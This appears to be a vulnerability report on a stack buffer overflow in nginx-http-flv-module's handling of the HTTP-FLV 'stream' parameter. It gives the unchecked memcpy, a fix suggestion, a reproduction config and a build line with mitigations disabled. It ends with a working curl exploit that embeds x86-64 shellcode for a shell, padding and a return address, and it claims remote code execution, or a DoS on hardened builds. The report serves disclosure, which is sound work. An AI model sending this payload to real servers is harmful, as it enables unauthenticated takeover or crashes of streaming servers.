ngx_memcpy(name, stream->data, stream->len);
name 定义为 u_char name[NGX_RTMP_MAX_NAME]; // #define NGX_RTMP_MAX_NAME 256, 如果stream 超过256字节,就会导致栈溢出
In English: `name` is declared as `u_char name[NGX_RTMP_MAX_NAME];` with `#define NGX_RTMP_MAX_NAME 256`, and `stream->len` is copied into it without ever being compared against that bound, so a stream name of 256 bytes or more overwrites the stack beyond `name`. The length appears to come straight from the `stream` query parameter of the HTTP-FLV request (see the PoC request below), i.e. it is attacker-controlled. The fix belongs before the copy: reject (or truncate) the name when `stream->len >= NGX_RTMP_MAX_NAME`, using `>=` rather than `>` if the buffer must stay NUL-terminated, and return whatever error value the enclosing function uses; the `ngx_memcpy` itself cannot be made safe by changing only the copy length without also handling the too-long case.
Configuration file / 配置文件
# Minimal nginx-http-flv-module configuration that reproduces the report
# above. Two RTMP applications are declared; the HTTP side exposes an
# HTTP-FLV playback endpoint (/live) and a stub on_connect handler (/connect).
worker_processes 1;
# Debug-level logging, presumably so the crash shows up in logs/error.log.
error_log logs/error.log debug;
events {
worker_connections 1024;
}
rtmp {
publish_notify on;
server {
listen 1935;
# on_connect calls back into the local HTTP server below; its /connect
# location answers 302 with the bare string "pppo", the name of the second
# application. Presumably the module follows that redirect to switch the
# application — confirm against the module's notify handling.
on_connect http://127.0.0.1:8080/connect;
application live {
live on;
}
application pppo {
live on;
}
}
}
http {
server {
listen 8080;
# HTTP-FLV playback endpoint; the PoC request below targets
# /live?app=live&stream=<oversized stream name>.
location /live {
flv_live on;
}
# on_connect target: a 302 whose "Location" is just "pppo", not a URL.
location /connect {
return 302 pppo;
}
}
}
Steps to reproduce the behavior / 复现问题步骤
关闭保护机制编译可造成远程任意命令执行。
In English: when nginx is built with the mitigations disabled as in the build line below (`-fno-stack-protector`: no stack canary; `-U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=0`: no fortified memcpy; `-z norelro -no-pie`: fixed addresses; `-z execstack`: executable stack), the overflow gives remote arbitrary code execution running as the worker user (`www-data` in this build). With a default hardened build the same request would still be expected to smash the stack and kill the worker (stack-protector abort or segfault), i.e. an unauthenticated remote DoS; the mitigations only change the impact, not whether the bug is reachable.
cd /src/nginx/; \
./auto/configure \
--user=www-data \
--group=www-data \
--add-module=/src/nginx-http-flv-module \
--with-cc-opt="-fno-stack-protector -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=0" \
--with-ld-opt="-z norelro -no-pie -z execstack" \
--with-threads\
--with-http_ssl_module; \
make; \
make install;
Exploit request (payload layout: shellcode + padding + return address pointing at a `jmp rsi` gadget). The gadget address in the trailing bytes is specific to this non-PIE build and must be re-derived for any other binary; the request is sent through `echo -e | xargs curl -vv`, so the `\x..` escapes below are expanded by `echo` before curl sends them.
echo -e "http://127.0.0.1:8080/live\?app\=live\&stream\=j\xff_H\x89\xe6jAH\xff\xc7j4XH\x89\xe2\x0f\x05\x85\xc0u\xf1H\x89\xfdj\x03^H\xff\xcex\x0bVj\!XH\x89\xef\x0f\x05\xeb\xefjhH\xb8/bin///sPH\x89\xe7hri\x01\x01\x814$\x01\x01\x01\x011\xf6Vj\x08^H\x01\xe6VH\x89\xe61\xd2j;X\x0f\x05CCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDLLLLLL\x9d\x8e\x42" | xargs curl -vv没有关闭保护机制可造成DoS漏洞